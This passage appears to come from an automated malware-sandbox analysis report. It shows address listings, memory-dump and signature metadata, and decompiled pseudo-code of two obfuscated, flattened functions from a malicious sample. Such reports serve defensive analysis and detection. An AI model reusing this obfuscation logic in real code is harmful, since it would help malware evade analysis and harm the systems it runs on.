                                                      0x0023d5e3
                                                      0x0023d62b
                                                      0x0023d630
                                                      0x0023d630
                                                      0x0023d634
                                                      0x00000000
                                                      0x0023d634
                                                      0x0023d5e5
                                                      0x0023d5f1
                                                      0x0023d612
                                                      0x0023d617
                                                      0x0023d61a
                                                      0x0023d621
                                                      0x00000000
                                                      0x0023d621
                                                      0x0023d3a4
                                                      0x0023d3aa
                                                      0x0023d498
                                                      0x0023d49a
                                                      0x0023d4a6
                                                      0x0023d4a9
                                                      0x0023d4aa
                                                      0x0023d4ac
                                                      0x0023d4c7
                                                      0x0023d4cc
                                                      0x0023d4cf
                                                      0x0023d4d1
                                                      0x0023d4ed
                                                      0x0023d4f2
                                                      0x0023d4f5
                                                      0x0023d4f5
                                                      0x0023d509
                                                      0x0023d50f
                                                      0x0023d510
                                                      0x00000000
                                                      0x0023d510
                                                      0x0023d3b0
                                                      0x0023d3b6
                                                      0x0023d423
                                                      0x0023d442
                                                      0x0023d447
                                                      0x0023d449
                                                      0x0023d45a
                                                      0x0023d474
                                                      0x0023d479
                                                      0x00000000
                                                      0x0023d479
                                                      0x0023d3b8
                                                      0x0023d3be
                                                      0x0023d414
                                                      0x0023d419
                                                      0x00000000
                                                      0x0023d419
                                                      0x0023d3c0
                                                      0x0023d3c6
                                                      0x00000000
                                                      0x00000000
                                                      0x0023d3e6
                                                      0x0023d3e8
                                                      0x0023d3ed
                                                      0x0023d3f1
                                                      0x0023d3f5
                                                      0x0023d3f5
                                                      0x0023d20d

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$.ll:$.$?o$@l$@|$Qjcc$T$Ta$ $Ta$ $XD$^$m^$r$rW$,$3$q$~
                                                      • API String ID: 0-3595463394
                                                      • Opcode ID: 0eafe49303bd8d60036b7d9460279cacbae51b3b53c16940995e943add2d1a7e
                                                      • Instruction ID: 6af76bccb27828694191b778dbff72edd729dd73bd216f88898328532aacbe5a
                                                      • Opcode Fuzzy Hash: 0eafe49303bd8d60036b7d9460279cacbae51b3b53c16940995e943add2d1a7e
                                                      • Instruction Fuzzy Hash: 62720FB15183818BE3B8CF25D54AB9BBBE1BBC4304F10891DE5D9962A0DBB58859CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023D7EB, Relevance: 21.6, Strings: 17, Instructions: 347COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E0023D7EB() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				void* _t365;
				intOrPtr _t367;
				signed int _t379;
				void* _t380;
				void* _t399;
				intOrPtr _t402;
				signed int _t408;
				intOrPtr _t409;
				intOrPtr* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t416;
				signed int* _t417;
				void* _t419;

				_t417 =  &_v1212;
				_v1164 = 0xe848;
				_v1164 = _v1164 << 0xc;
				_t380 = 0xeb1d0fe;
				_v1164 = _v1164 << 2;
				_v1164 = _v1164 ^ 0x3a120029;
				_v1196 = 0xb50a;
				_v1196 = _v1196 * 0x54;
				_v1196 = _v1196 << 1;
				_v1196 = _v1196 << 0xc;
				_v1196 = _v1196 ^ 0x6ce97179;
				_v1072 = 0xa1a9;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 ^ 0x00006740;
				_v1112 = 0x5ab8;
				_v1112 = _v1112 | 0xd40f1486;
				_v1112 = _v1112 ^ 0xd40f3c8d;
				_v1168 = 0x99b2;
				_v1168 = _v1168 ^ 0x8e209920;
				_v1168 = _v1168 + 0x17b0;
				_v1168 = _v1168 + 0xffff252c;
				_v1168 = _v1168 ^ 0x8e1f3ab7;
				_v1108 = 0x6700;
				_v1108 = _v1108 ^ 0xd74b138d;
				_v1108 = _v1108 ^ 0xd74b4d2a;
				_v1116 = 0xa6d3;
				_v1116 = _v1116 << 0xc;
				_v1116 = _v1116 ^ 0x0a6d47ef;
				_v1144 = 0x46d4;
				_v1144 = _v1144 | 0x60392883;
				_t411 = 0x3e;
				_v1052 = _v1052 & 0x00000000;
				_v1144 = _v1144 / _t411;
				_v1144 = _v1144 ^ 0x018d3ef5;
				_v1212 = 0x195d;
				_v1212 = _v1212 + 0x9a8f;
				_v1212 = _v1212 >> 2;
				_v1212 = _v1212 >> 0xf;
				_v1212 = _v1212 ^ 0x00005610;
				_v1092 = 0x8c48;
				_v1092 = _v1092 | 0x14bcb660;
				_v1092 = _v1092 ^ 0x14bcd719;
				_v1184 = 0xdf30;
				_v1184 = _v1184 | 0x71150163;
				_v1184 = _v1184 + 0xffff3ca6;
				_v1184 = _v1184 >> 5;
				_v1184 = _v1184 ^ 0x03888299;
				_v1100 = 0xf0a2;
				_v1100 = _v1100 >> 2;
				_v1100 = _v1100 ^ 0x00007018;
				_v1076 = 0xde4e;
				_v1076 = _v1076 * 0x25;
				_v1076 = _v1076 ^ 0x0020254d;
				_v1084 = 0x8f7c;
				_v1084 = _v1084 + 0x3023;
				_v1084 = _v1084 ^ 0x00008967;
				_v1136 = 0x4c3;
				_v1136 = _v1136 + 0xbbe6;
				_v1136 = _v1136 | 0x03b94668;
				_v1136 = _v1136 ^ 0x03b9f10c;
				_v1120 = 0xdab0;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x0003158f;
				_v1080 = 0xb6c1;
				_v1080 = _v1080 ^ 0x2339c7b2;
				_v1080 = _v1080 ^ 0x2339156d;
				_v1152 = 0xaa63;
				_v1152 = _v1152 | 0x7d17af71;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x7af75802;
				_v1088 = 0x49a;
				_v1088 = _v1088 >> 9;
				_v1088 = _v1088 ^ 0x00004f36;
				_v1192 = 0x2678;
				_v1192 = _v1192 + 0xb679;
				_v1192 = _v1192 << 0x10;
				_v1192 = _v1192 + 0xffff3370;
				_v1192 = _v1192 ^ 0xdcf068a3;
				_v1064 = 0xeafb;
				_v1064 = _v1064 << 1;
				_v1064 = _v1064 ^ 0x00019538;
				_v1096 = 0x88f8;
				_t412 = 0x34;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x002a1ade;
				_v1132 = 0xf8dd;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 * 6;
				_v1132 = _v1132 ^ 0x2ea92e25;
				_v1148 = 0xb66c;
				_v1148 = _v1148 * 0x79;
				_v1148 = _v1148 * 0x37;
				_v1148 = _v1148 ^ 0x12863225;
				_v1044 = 0x2ced;
				_v1044 = _v1044 | 0x6c1d274b;
				_v1044 = _v1044 ^ 0x6c1d554c;
				_v1104 = 0xd4fb;
				_v1104 = _v1104 + 0xc222;
				_v1104 = _v1104 ^ 0x0001c0a4;
				_v1140 = 0xeff1;
				_v1140 = _v1140 | 0x2c578e17;
				_v1140 = _v1140 ^ 0x1f5808a8;
				_v1140 = _v1140 ^ 0x330f90e2;
				_v1156 = 0x54a4;
				_v1156 = _v1156 ^ 0xe69aec3e;
				_v1156 = _v1156 ^ 0x7a062859;
				_v1156 = _v1156 ^ 0x9c9c8f10;
				_v1180 = 0xa2be;
				_v1180 = _v1180 / _t412;
				_v1180 = _v1180 << 0xb;
				_v1180 = _v1180 << 6;
				_v1180 = _v1180 ^ 0x0642737d;
				_v1204 = 0x65ae;
				_v1204 = _v1204 + 0xb2b7;
				_v1204 = _v1204 + 0xbb73;
				_v1204 = _v1204 << 6;
				_v1204 = _v1204 ^ 0x0074b164;
				_v1176 = 0x3ecd;
				_v1176 = _v1176 | 0x1d534930;
				_v1176 = _v1176 << 0xa;
				_v1176 = _v1176 ^ 0x842f9ee3;
				_v1176 = _v1176 ^ 0xc9d04901;
				_v1056 = 0xf360;
				_v1056 = _v1056 | 0x93122b66;
				_v1056 = _v1056 ^ 0x9312fd26;
				_v1124 = 0x4a26;
				_v1124 = _v1124 | 0x286a3d77;
				_v1124 = _v1124 ^ 0x286a2522;
				_v1060 = 0x57ed;
				_v1060 = _v1060 + 0x784b;
				_v1060 = _v1060 ^ 0x0000c3a5;
				_v1068 = 0x69c7;
				_v1068 = _v1068 << 5;
				_v1068 = _v1068 ^ 0x000d6de9;
				_v1208 = 0xffbd;
				_v1208 = _v1208 * 0x3d;
				_v1208 = _v1208 << 5;
				_v1208 = _v1208 + 0x87f5;
				_v1208 = _v1208 ^ 0x079ed184;
				_v1128 = 0x5d27;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x62edd6dc;
				_v1128 = _v1128 ^ 0x62ed9c54;
				_v1048 = 0x8776;
				_t413 = 0x1e;
				_t408 = _v1052;
				_v1048 = _v1048 * 0xc;
				_v1048 = _v1048 ^ 0x000959b7;
				_v1172 = 0x35cb;
				_t379 = _v1052;
				_v1172 = _v1172 / _t413;
				_v1172 = _v1172 | 0x92682d74;
				_v1172 = _v1172 ^ 0x346a72ec;
				_v1172 = _v1172 ^ 0xa6025f11;
				_v1188 = 0x8f0f;
				_t414 = 0x66;
				_t416 = _v1052;
				_v1188 = _v1188 / _t414;
				_v1188 = _v1188 << 5;
				_v1188 = _v1188 + 0x12e7;
				_v1188 = _v1188 ^ 0x00003fc5;
				_v1200 = 0x51b9;
				_v1200 = _v1200 | 0x17a7f9cb;
				_v1200 = _v1200 << 8;
				_v1200 = _v1200 | 0xe40f2208;
				_v1200 = _v1200 ^ 0xe7fffb08;
				_v1160 = 0x57cd;
				_v1160 = _v1160 + 0xffffc371;
				_v1160 = _v1160 ^ 0x54a04296;
				_v1160 = _v1160 ^ 0x54a059b8;
				while(1) {
					L1:
					_t399 = 0x5c;
					do {
						while(1) {
							L2:
							_t419 = _t380 - 0x21daabfe;
							if(_t419 > 0) {
								break;
							}
							if(_t419 == 0) {
								_t409 =  *0x24ca2c; // 0x698300
								_t410 = _t409 + 0x230;
								while(1) {
									__eflags =  *_t410 - _t399;
									if( *_t410 == _t399) {
										break;
									}
									_t410 = _t410 + 2;
									__eflags = _t410;
								}
								_t408 = _t410 + 2;
								_t380 = 0x3af90ff3;
								continue;
							}
							if(_t380 == 0x222340b) {
								E00235FB2(_v1208, _v1128, _t379);
								L27:
								return _v1052;
							}
							if(_t380 == 0x88778bb) {
								_t416 = E002354FE(_v1088, _v1160, _v1192, _v1064, _t380, _t380, _t408, _v1096, _v1200, _v1172, _v1132, _v1148, _v1044, _t380, _v1104, _t408,  &_v1040, _v1188, _t380, _t379, _v1140, _v1156, _t380, _v1180);
								_t417 =  &(_t417[0x16]);
								__eflags = _t416;
								if(_t416 == 0) {
									_t380 = 0x222340b;
								} else {
									_t380 = 0x212fea65;
									_v1052 = 1;
								}
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 == 0xeb1d0fe) {
								_push(_t380);
								_push(_t380);
								E0023C6C7(_v1196, _v1072,  &_v520, _t380, _v1112, _v1164, _v1168);
								_t417 =  &(_t417[7]);
								_t380 = 0x3304c1c2;
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 != 0x212fea65) {
								goto L24;
							}
							E002442DA(_t416, _v1204, _v1176, _v1056, _t379, _v1124);
							_t417 =  &(_t417[4]);
							_t380 = 0x2e0be9f8;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x2e0be9f8;
						if(_t380 == 0x2e0be9f8) {
							E00235FB2(_v1060, _v1068, _t416);
							_t380 = 0x222340b;
							_t399 = 0x5c;
							goto L24;
						}
						__eflags = _t380 - 0x3304c1c2;
						if(__eflags == 0) {
							_push(_v1116);
							_t365 = E0024889D(0x24c930, _v1108, __eflags);
							_t367 =  *0x24ca2c; // 0x698300
							_t402 =  *0x24ca2c; // 0x698300
							E002329E3(_t402, 0x104, _t365, _v1144, _v1212, _v1092, _t367 + 0x230,  &_v1040, _v1184, _v1100);
							E00242025(_v1076, _t365, _v1084, _v1136);
							_t417 =  &(_t417[0xc]);
							_t380 = 0x21daabfe;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x3af90ff3;
						if(_t380 != 0x3af90ff3) {
							goto L24;
						}
						_t379 = E00232959(_t380, _v1120, _v1080, _v1152, _v1048);
						_t417 =  &(_t417[4]);
						__eflags = _t379;
						if(_t379 == 0) {
							goto L27;
						}
						_t380 = 0x88778bb;
						goto L1;
						L24:
						__eflags = _t380 - 0x27fd7905;
					} while (_t380 != 0x27fd7905);
					goto L27;
				}
			}
































































                                                      0x0023d7eb
                                                      0x0023d7f1
                                                      0x0023d7fb
                                                      0x0023d800
                                                      0x0023d805
                                                      0x0023d80a
                                                      0x0023d812
                                                      0x0023d823
                                                      0x0023d827
                                                      0x0023d82b
                                                      0x0023d830
                                                      0x0023d838
                                                      0x0023d843
                                                      0x0023d84b
                                                      0x0023d856
                                                      0x0023d85e
                                                      0x0023d866
                                                      0x0023d86e
                                                      0x0023d876
                                                      0x0023d87e
                                                      0x0023d886
                                                      0x0023d88e
                                                      0x0023d896
                                                      0x0023d89e
                                                      0x0023d8a6
                                                      0x0023d8ae
                                                      0x0023d8b6
                                                      0x0023d8bb
                                                      0x0023d8c3
                                                      0x0023d8cb
                                                      0x0023d8d9
                                                      0x0023d8dc
                                                      0x0023d8e4
                                                      0x0023d8e8
                                                      0x0023d8f0
                                                      0x0023d8f8
                                                      0x0023d900
                                                      0x0023d905
                                                      0x0023d90a
                                                      0x0023d912
                                                      0x0023d91d
                                                      0x0023d928
                                                      0x0023d933
                                                      0x0023d93b
                                                      0x0023d943
                                                      0x0023d94b
                                                      0x0023d950
                                                      0x0023d958
                                                      0x0023d963
                                                      0x0023d96b
                                                      0x0023d976
                                                      0x0023d989
                                                      0x0023d990
                                                      0x0023d99b
                                                      0x0023d9a6
                                                      0x0023d9b1
                                                      0x0023d9bc
                                                      0x0023d9c4
                                                      0x0023d9cc
                                                      0x0023d9d4
                                                      0x0023d9dc
                                                      0x0023d9e4
                                                      0x0023d9e9
                                                      0x0023d9f1
                                                      0x0023d9fc
                                                      0x0023da07
                                                      0x0023da12
                                                      0x0023da1a
                                                      0x0023da22
                                                      0x0023da27
                                                      0x0023da2f
                                                      0x0023da3a
                                                      0x0023da42
                                                      0x0023da4f
                                                      0x0023da57
                                                      0x0023da5f
                                                      0x0023da64
                                                      0x0023da6c
                                                      0x0023da74
                                                      0x0023da7f
                                                      0x0023da86
                                                      0x0023da91
                                                      0x0023daa6
                                                      0x0023daa7
                                                      0x0023daae
                                                      0x0023dab9
                                                      0x0023dac1
                                                      0x0023dacb
                                                      0x0023dacf
                                                      0x0023dad7
                                                      0x0023dae4
                                                      0x0023daed
                                                      0x0023daf1
                                                      0x0023daf9
                                                      0x0023db04
                                                      0x0023db0f
                                                      0x0023db1a
                                                      0x0023db22
                                                      0x0023db2a
                                                      0x0023db32
                                                      0x0023db3a
                                                      0x0023db42
                                                      0x0023db4a
                                                      0x0023db52
                                                      0x0023db5a
                                                      0x0023db62
                                                      0x0023db6a
                                                      0x0023db72
                                                      0x0023db80
                                                      0x0023db84
                                                      0x0023db89
                                                      0x0023db8e
                                                      0x0023db96
                                                      0x0023db9e
                                                      0x0023dba6
                                                      0x0023dbae
                                                      0x0023dbb3
                                                      0x0023dbbb
                                                      0x0023dbc3
                                                      0x0023dbcb
                                                      0x0023dbd0
                                                      0x0023dbd8
                                                      0x0023dbe0
                                                      0x0023dbeb
                                                      0x0023dbf6
                                                      0x0023dc01
                                                      0x0023dc09
                                                      0x0023dc11
                                                      0x0023dc19
                                                      0x0023dc24
                                                      0x0023dc2f
                                                      0x0023dc3a
                                                      0x0023dc45
                                                      0x0023dc4d
                                                      0x0023dc58
                                                      0x0023dc65
                                                      0x0023dc69
                                                      0x0023dc6e
                                                      0x0023dc76
                                                      0x0023dc7e
                                                      0x0023dc86
                                                      0x0023dc8b
                                                      0x0023dc93
                                                      0x0023dc9b
                                                      0x0023dcb2
                                                      0x0023dcb5
                                                      0x0023dcbc
                                                      0x0023dcc3
                                                      0x0023dcce
                                                      0x0023dcde
                                                      0x0023dce5
                                                      0x0023dce9
                                                      0x0023dcf1
                                                      0x0023dcf9
                                                      0x0023dd01
                                                      0x0023dd0d
                                                      0x0023dd10
                                                      0x0023dd17
                                                      0x0023dd1b
                                                      0x0023dd20
                                                      0x0023dd28
                                                      0x0023dd30
                                                      0x0023dd38
                                                      0x0023dd40
                                                      0x0023dd45
                                                      0x0023dd4d
                                                      0x0023dd55
                                                      0x0023dd5d
                                                      0x0023dd65
                                                      0x0023dd6d
                                                      0x0023dd75
                                                      0x0023dd75
                                                      0x0023dd77
                                                      0x0023dd78
                                                      0x0023dd78
                                                      0x0023dd78
                                                      0x0023dd78
                                                      0x0023dd7e
                                                      0x00000000
                                                      0x00000000
                                                      0x0023dd84
                                                      0x0023de9f
                                                      0x0023dea5
                                                      0x0023deb0
                                                      0x0023deb0
                                                      0x0023deb3
                                                      0x00000000
                                                      0x00000000
                                                      0x0023dead
                                                      0x0023dead
                                                      0x0023dead
                                                      0x0023deb5
                                                      0x0023deb8
                                                      0x00000000
                                                      0x0023deb8
                                                      0x0023dd90
                                                      0x0023dfca
                                                      0x0023dfd0
                                                      0x0023dfe1
                                                      0x0023dfe1
                                                      0x0023dd9c
                                                      0x0023de77
                                                      0x0023de79
                                                      0x0023de7c
                                                      0x0023de7e
                                                      0x0023de95
                                                      0x0023de80
                                                      0x0023de80
                                                      0x0023de85
                                                      0x0023de85
                                                      0x0023dd75
                                                      0x0023dd75
                                                      0x0023dd77
                                                      0x00000000
                                                      0x0023dd77
                                                      0x0023dd75
                                                      0x0023dda4
                                                      0x0023ddd7
                                                      0x0023ddd8
                                                      0x0023ddfc
                                                      0x0023de01
                                                      0x0023de04
                                                      0x0023dd75
                                                      0x0023dd75
                                                      0x0023dd77
                                                      0x00000000
                                                      0x0023dd77
                                                      0x0023dd75
                                                      0x0023ddac
                                                      0x00000000
                                                      0x00000000
                                                      0x0023ddc8
                                                      0x0023ddcd
                                                      0x0023ddd0
                                                      0x0023dd75
                                                      0x0023dd75
                                                      0x0023dd77
                                                      0x00000000
                                                      0x0023dd77
                                                      0x0023dd75
                                                      0x0023dec2
                                                      0x0023dec8
                                                      0x0023dfa5
                                                      0x0023dfad
                                                      0x0023dfb2
                                                      0x00000000
                                                      0x0023dfb2
                                                      0x0023dece
                                                      0x0023ded4
                                                      0x0023df14
                                                      0x0023df21
                                                      0x0023df42
                                                      0x0023df5c
                                                      0x0023df68
                                                      0x0023df84
                                                      0x0023df89
                                                      0x0023df8c
                                                      0x0023dd75
                                                      0x0023dd75
                                                      0x0023dd77
                                                      0x00000000
                                                      0x0023dd77
                                                      0x0023dd75
                                                      0x0023ded6
                                                      0x0023dedc
                                                      0x00000000
                                                      0x00000000
                                                      0x0023defd
                                                      0x0023deff
                                                      0x0023df02
                                                      0x0023df04
                                                      0x00000000
                                                      0x00000000
                                                      0x0023df0a
                                                      0x00000000
                                                      0x0023dfb3
                                                      0x0023dfb3
                                                      0x0023dfb3
                                                      0x00000000
                                                      0x0023dfbf

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "%j($#0$']$)$6O$@g$H$Kx$M% $e/!$e/!$x&$yql$,$Gm$m$rj4
                                                      • API String ID: 0-131801274
                                                      • Opcode ID: 61fbbcd455303a2ad308e7192a3d92a0ad205c5b633f39f3807cce9f6adba335
                                                      • Instruction ID: f0652c60c2030b04f56ac6c6b72ec14c1f32b52df568f1e03542b88ce1f96c4f
                                                      • Opcode Fuzzy Hash: 61fbbcd455303a2ad308e7192a3d92a0ad205c5b633f39f3807cce9f6adba335
                                                      • Instruction Fuzzy Hash: 9A0213B1119380DFE369CF61D58AA5BBBF1FBC5708F10891DE29A86260C7B58958CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023F98C, Relevance: 20.4, Strings: 16, Instructions: 390COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E0023F98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				intOrPtr _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr _v268;
				void* __ecx;
				void* _t344;
				void* _t374;
				signed int _t377;
				intOrPtr _t391;
				void* _t392;
				intOrPtr _t393;
				signed int _t395;
				intOrPtr _t396;
				signed int _t397;
				intOrPtr* _t401;
				intOrPtr _t403;
				intOrPtr* _t416;
				char* _t448;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				char* _t460;
				void* _t461;
				intOrPtr* _t468;
				void* _t470;
				void* _t472;

				_t401 = _a4;
				_push(_a16);
				_t468 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_t401);
				_push(__edx);
				E0023602B(_t344);
				_v180 = 0x2a54;
				_t470 =  &_v268 + 0x18;
				_v180 = _v180 ^ 0xdbb28899;
				_t403 = 0;
				_t461 = 0x405be48;
				_v268 = 0;
				_t450 = 0x55;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0xa04911e4;
				_v164 = 0x788;
				_v164 = _v164 * 0x79;
				_v164 = _v164 ^ 0x00038f4a;
				_v260 = 0xdd03;
				_v260 = _v260 ^ 0x82285f25;
				_v260 = _v260 >> 7;
				_v260 = _v260 << 4;
				_v260 = _v260 ^ 0x104552fc;
				_v132 = 0x81fa;
				_v132 = _v132 | 0x4b6553e1;
				_v132 = _v132 ^ 0x4b658f00;
				_v208 = 0xbd69;
				_t451 = 0x73;
				_v208 = _v208 / _t450;
				_v208 = _v208 + 0x56ba;
				_v208 = _v208 ^ 0x000029ec;
				_v156 = 0x625a;
				_v156 = _v156 + 0xffff65b2;
				_v156 = _v156 ^ 0xffffa807;
				_v176 = 0xc378;
				_v176 = _v176 >> 1;
				_v176 = _v176 + 0x1919;
				_v176 = _v176 ^ 0x00004408;
				_v228 = 0xbfad;
				_v228 = _v228 + 0xffff004b;
				_v228 = _v228 / _t451;
				_t452 = 0x16;
				_v228 = _v228 / _t452;
				_v228 = _v228 ^ 0x0019c242;
				_v264 = 0x218a;
				_v264 = _v264 | 0xaefe0d97;
				_v264 = _v264 + 0x77f0;
				_v264 = _v264 + 0xffffbecb;
				_v264 = _v264 ^ 0xaefe1c0e;
				_v152 = 0x1773;
				_v152 = _v152 + 0x7c73;
				_v152 = _v152 ^ 0x000090c4;
				_v140 = 0xfcb3;
				_v140 = _v140 + 0xffff1dd8;
				_v140 = _v140 ^ 0x00004a86;
				_v252 = 0x9e2f;
				_t453 = 9;
				_v252 = _v252 / _t453;
				_v252 = _v252 << 0xc;
				_v252 = _v252 + 0x6e7b;
				_v252 = _v252 ^ 0x01198ad6;
				_v136 = 0x978d;
				_v136 = _v136 << 0xb;
				_v136 = _v136 ^ 0x04bc6438;
				_v144 = 0xf0b5;
				_t454 = 0x79;
				_v144 = _v144 * 0x51;
				_v144 = _v144 ^ 0x004c2c51;
				_v224 = 0xa482;
				_v224 = _v224 ^ 0xc585cea3;
				_v224 = _v224 / _t454;
				_v224 = _v224 ^ 0x01a18743;
				_v148 = 0xd0a0;
				_v148 = _v148 >> 1;
				_v148 = _v148 ^ 0x000025e7;
				_v232 = 0xead1;
				_v232 = _v232 ^ 0xc3cfbc77;
				_v232 = _v232 | 0xf3c428cf;
				_v232 = _v232 + 0xffff938a;
				_v232 = _v232 ^ 0xf3cf35e7;
				_v160 = 0xb488;
				_v160 = _v160 + 0xf6e2;
				_v160 = _v160 ^ 0x0001c37e;
				_v212 = 0xc903;
				_t455 = 0x1e;
				_v212 = _v212 / _t455;
				_v212 = _v212 ^ 0xfd3886ab;
				_v212 = _v212 ^ 0xfd38fa88;
				_v196 = 0xdd05;
				_v196 = _v196 << 5;
				_v196 = _v196 + 0xdc4b;
				_v196 = _v196 ^ 0x001c7bd6;
				_v200 = 0x4db0;
				_v200 = _v200 ^ 0x1a7afaec;
				_v200 = _v200 >> 8;
				_v200 = _v200 ^ 0x001a5e83;
				_v240 = 0x9d3f;
				_v240 = _v240 >> 8;
				_v240 = _v240 << 9;
				_v240 = _v240 + 0x917a;
				_v240 = _v240 ^ 0x0001a611;
				_v256 = 0x4a86;
				_v256 = _v256 >> 0xd;
				_t456 = 0x55;
				_v256 = _v256 * 0x35;
				_v256 = _v256 + 0xffffab30;
				_v256 = _v256 ^ 0xffffb251;
				_v204 = 0x386;
				_v204 = _v204 / _t456;
				_v204 = _v204 ^ 0xc8309f8e;
				_v204 = _v204 ^ 0xc830cb09;
				_v172 = 0x8769;
				_v172 = _v172 >> 0xe;
				_v172 = _v172 ^ 0x00003b2d;
				_v244 = 0x2b5b;
				_v244 = _v244 + 0xb0ca;
				_v244 = _v244 + 0xd805;
				_v244 = _v244 << 2;
				_v244 = _v244 ^ 0x0006bd06;
				_v184 = 0x1527;
				_v184 = _v184 | 0xeeea078d;
				_t457 = 0x28;
				_v184 = _v184 / _t457;
				_v184 = _v184 ^ 0x05f92fca;
				_v192 = 0x11fc;
				_t458 = 0x16;
				_v192 = _v192 / _t458;
				_v192 = _v192 ^ 0x8895e54e;
				_v192 = _v192 ^ 0x8895ebcd;
				_v168 = 0xe011;
				_v168 = _v168 + 0x4c50;
				_v168 = _v168 ^ 0x0001058b;
				_v216 = 0xf07;
				_t459 = 0x32;
				_v216 = _v216 * 0x36;
				_v216 = _v216 >> 2;
				_v216 = _v216 ^ 0x00008949;
				_v248 = 0xde23;
				_v248 = _v248 + 0xecd9;
				_v248 = _v248 << 0xd;
				_v248 = _v248 ^ 0x1d8b17f5;
				_v248 = _v248 ^ 0x24d4a8d4;
				_v220 = 0x3854;
				_v220 = _v220 | 0x09b0f0f7;
				_v220 = _v220 + 0xe63e;
				_v220 = _v220 ^ 0x09b1b8f3;
				_v188 = 0x295e;
				_v188 = _v188 * 0x23;
				_v188 = _v188 / _t459;
				_v188 = _v188 ^ 0x00001cf4;
				_t460 = _v124;
				while(1) {
					L1:
					_t441 = _v236;
					while(1) {
						L2:
						_t472 = _t461 - 0x299f8b6c;
						if(_t472 <= 0) {
							break;
						}
						if(_t461 == 0x2e2d51e6) {
							_v124 = 0x14;
							_t374 = E0023F39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
							_t403 = _v268;
							_t470 = _t470 + 0x1c;
							_t441 = _v236;
							if(_t374 == 0) {
								continue;
							}
							_t461 = 0x8f3e942;
							_t403 = 1;
							_v268 = 1;
							L29:
							if(_t461 == 0x33ec2607) {
								L33:
								return _v268;
							}
							while(1) {
								L1:
								_t441 = _v236;
								goto L2;
							}
						}
						if(_t461 == 0x2e332bc4) {
							E00242674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
							_t470 = _t470 + 0x14;
							_t461 = 0x2452d659;
							L9:
							_t403 = _v268;
							goto L1;
						}
						if(_t461 == 0x2efa85f7) {
							_t377 = _a4 + 1;
							if((_t377 & 0x0000000f) != 0) {
								_t377 = (_t377 & 0xfffffff0) + 0x10;
							}
							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
							_push(_t403);
							_push(_t403);
							_t460 = E00238736( *((intOrPtr*)(_t401 + 4)));
							 *_t401 = _t460;
							if(_t460 == 0) {
								goto L33;
							} else {
								_t317 = _t460 + 0x74; // 0x74
								_t441 = _t317;
								_v116 = _a4;
								_t461 = 0x332cf2c2;
								_t403 = _v268;
								_v236 = _t317;
								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
								continue;
							}
						}
